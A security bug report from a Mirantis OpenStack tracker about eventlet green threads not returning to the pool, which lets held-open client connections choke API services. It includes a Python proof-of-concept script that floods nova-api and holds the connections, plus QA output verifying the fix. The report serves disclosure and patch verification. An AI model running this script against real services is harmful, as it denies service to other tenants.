[no-OSSN-yet] Eventlet green threads not released back to the pool leading to choking of new requests (no-CVE-yet)

Bug #1506600 reported by Adam Heczko
Affects             Status        Importance  Assigned to     Milestone
Mirantis OpenStack  Fix Released  Medium      Alexey Khivin
  5.1.x             Won't Fix     Medium      Unassigned
  6.0.x             Won't Fix     Medium      Unassigned
  6.1.x             Won't Fix     Medium      Unassigned

Bug Description

Tushar Patil reported a vulnerability affecting all or most OpenStack APIs.

It is possible to choke OpenStack API controller services that use the wsgi+eventlet stack simply by not closing the client socket connection. Whenever a request is received by any OpenStack API service, for example the nova-api service, the eventlet library takes a green thread from the pool and starts processing the request. Even after the response has been sent to the caller, the green thread is not returned to the pool until the client socket connection is closed.

A malicious user can therefore probe the API controller node to determine the wsgi pool size configured for the given service, send that many requests, and after receiving the responses simply hold the connections open indefinitely, disrupting the service for other tenants. Even when the service provider has enabled rate limiting, a group of tenants acting together can still choke the API services.
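The failure mode can be sketched with a plain stdlib thread pool standing in for eventlet's green-thread pool (a hypothetical illustration, not OpenStack code): each "request" keeps its worker pinned until the client "closes its socket", so once pool-size requests are parked, a legitimate request cannot be served.

```python
import concurrent.futures
import threading
import time

POOL_SIZE = 4  # stand-in for the configured wsgi pool size
pool = concurrent.futures.ThreadPoolExecutor(max_workers=POOL_SIZE)

# One Event per attacker connection; set() models "client closes socket".
close_events = [threading.Event() for _ in range(POOL_SIZE)]
responses_sent = []

def handle_request(number, close_event):
    responses_sent.append(number)  # the "response" goes out immediately...
    close_event.wait()             # ...but the worker stays pinned until
                                   # the client "closes its socket"

# The attacker opens POOL_SIZE connections and never closes them.
for number, event in enumerate(close_events):
    pool.submit(handle_request, number, event)

time.sleep(0.2)  # let every worker pick up its blocking "request"

victim = pool.submit(lambda: "served")  # a legitimate request arrives
time.sleep(0.2)
choked = not victim.done()  # True: all workers are still pinned

for event in close_events:
    event.set()  # the attacker finally closes the connections

result = victim.result(timeout=5)  # the pool drains and the request runs
pool.shutdown()
print(choked, result)
```

The point of the sketch is that the response was already sent for every attacker request; the workers are held hostage purely by the unclosed connections.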

References to proposed upstream patches:
https://bugs.launchpad.net/nova/+bug/1361360

Please review whether this applies to MOS, i.e. every API component we ship with 7.0.

Tags: heat
Revision history for this message
Vitaly Sedelnik (vsedelnik) wrote :

https://review.openstack.org/224941 needs to be cherry-picked
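For context, the upstream fixes for bug 1361360 took the form of a configurable client socket timeout. A sketch of the corresponding nova.conf setting (option name per the upstream patch; the value here is illustrative):

```ini
[DEFAULT]
# Seconds to wait for an idle client connection before closing it.
# 0 means wait forever (the vulnerable behaviour); a finite value
# lets the green thread return to the pool once the client goes silent.
client_socket_timeout = 900
```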

Changed in mos:
status: New → Confirmed
assignee: nobody → MOS Maintenance (mos-maintenance)
tags: added: 70mu1-confirmed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Agreed; note that this applies to all APIs running under eventlet, not only Heat.

Alexey Khivin (akhivin)
Changed in mos:
assignee: MOS Maintenance (mos-maintenance) → Alexey Khivin (akhivin)
Alexey Khivin (akhivin)
Changed in mos:
status: Confirmed → In Progress
tags: added: heat
Alexey Khivin (akhivin)
Changed in mos:
status: In Progress → Fix Committed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Hi, are all APIs shipped with MOS and affected by this issue patched, or only Heat?

tags: removed: 70mu1-confirmed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Eventlet green thread choking is described in the upstream bug report.
Steps to reproduce the choking vulnerability:

The following program illustrates choking of the nova-api service (but the problem is present in all other OpenStack API services using wsgi+eventlet).

Note: I have explicitly set the wsgi_default_pool_size default value to 10 in nova/wsgi.py in order to reproduce this problem.
After you run the program below, try to invoke the API.
============================================================================================
import time
from multiprocessing import Process

import requests


def request(number):
    # The port matters here: 8774 is the nova-api endpoint.
    path = 'http://127.0.0.1:8774/servers'
    try:
        response = requests.get(path)
        print("RESPONSE %s-%d" % (response.status_code, number))
        # During this sleep, check on the API controller node whether
        # the client socket connection has been released or not.
        time.sleep(1000)
        print("Thread %d complete" % number)
    except requests.exceptions.RequestException as ex:
        print("Exception occurred %d-%s" % (number, str(ex)))


if __name__ == '__main__':
    processes = []
    for number in range(40):
        p = Process(target=request, args=(number,))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
================================================================================================
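The mitigation in the upstream patches is essentially a server-side idle timeout on the client socket. A minimal stdlib sketch of the idea (hypothetical, not OpenStack code): once the client goes silent, the timeout fires and the worker can close the connection instead of waiting forever.

```python
import socket

# Server side: listen on an ephemeral localhost port.
srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
port = srv.getsockname()[1]

# Attacker side: connect, then go silent without closing.
client = socket.create_connection(("127.0.0.1", port))

conn, _ = srv.accept()
conn.settimeout(0.5)  # the idle timeout is what frees the worker

timed_out = False
try:
    conn.recv(1024)   # would block forever without the timeout
except socket.timeout:
    timed_out = True  # the worker can now close the connection and
                      # hand its green thread back to the pool

conn.close()
client.close()
srv.close()
print(timed_out)
```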

Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :

Verified on my QA lab with MOS 7.0 MU1.

Steps To Verify:
1. Take the script from comment #4, provided by Adam.
2. Run the script on a controller node.
3. Run 'nova list' and 'nova flavor-list'.

Observed Result:

In one console:
________________________________
root@node-12:~# python test.py
RESPONSE 300-3
RESPONSE 300-2
RESPONSE 300-4
RESPONSE 300-0
RESPONSE 300-8
RESPONSE 300-9
RESPONSE 300-6
RESPONSE 300-7
RESPONSE 300-1
RESPONSE 300-5
RESPONSE 300-10
RESPONSE 300-12
RESPONSE 300-11
RESPONSE 300-13
RESPONSE 300-15
RESPONSE 300-14
RESPONSE 300-16
RESPONSE 300-20
RESPONSE 300-17
RESPONSE 300-21
RESPONSE 300-22
RESPONSE 300-18
RESPONSE 300-19
RESPONSE 300-26
RESPONSE 300-27
RESPONSE 300-23
RESPONSE 300-25
RESPONSE 300-24
RESPONSE 300-31
RESPONSE 300-28
RESPONSE 300-29
RESPONSE 300-30
RESPONSE 300-32
RESPONSE 300-34
RESPONSE 300-36
RESPONSE 300-39
RESPONSE 300-35
RESPONSE 300-33
RESPONSE 300-38
RESPONSE 300-37
________________________________

in other console:
________________________________
root@node-13:~# nova list
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
| ID                                   | Name    | Status | Task State | Power State | Networks                        |
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
| 18115f2c-accb-4db5-a366-fdc72e627558 | vm_EW_1 | ACTIVE | -          | Running     | net_EW_1=10.1.1.5               |
| a1933565-3d4b-455b-81f5-9bd79fd128f0 | vm_EW_2 | ACTIVE | -          | Running     | net_EW_2=10.1.2.5               |
| b6153f67-9401-4192-bdcb-dc684d7cf8b0 | vm_NS   | ACTIVE | -          | Running     | net_NS=10.2.0.5, 172.18.161.201 |
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
root@node-13:~# nova flavor-list
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
| ID                                   | Name      | Memory_MB | Disk | Ephemeral | Swap | VCPUs | RXTX_Factor | Is_Public |
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
| 1                                    | m1.tiny   | 512       | 1    | 0         |      | 1     | 1.0         | True      |
| 2                                    | m1.small  | 2048      | 20   | 0         |      | 1     | 1.0         | True      |
| 3                                    | m1.medium | 4096      | 40   | 0         |      | 2     | 1.0         | True      |
| 4                                    | m1.large  | 8192      | 80   | 0         |      | 4     | 1.0         | True      |
| 5                                    | m1.xlarge | 16384     | 160  | 0         |      | 8     | 1.0         | True      |
| d646cf39-ece7-42c9-841a-b230ebc8c74b | m1.micro  | 64        | 0    | 0         |      | 1     | 1.0         | True      |
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
________________________________


Changed in mos:
status: Fix Committed → Fix Released
Changed in mos:
importance: High → Medium
information type: Private Security → Public Security
This report contains Public Security information  
Everyone can see this security related information.
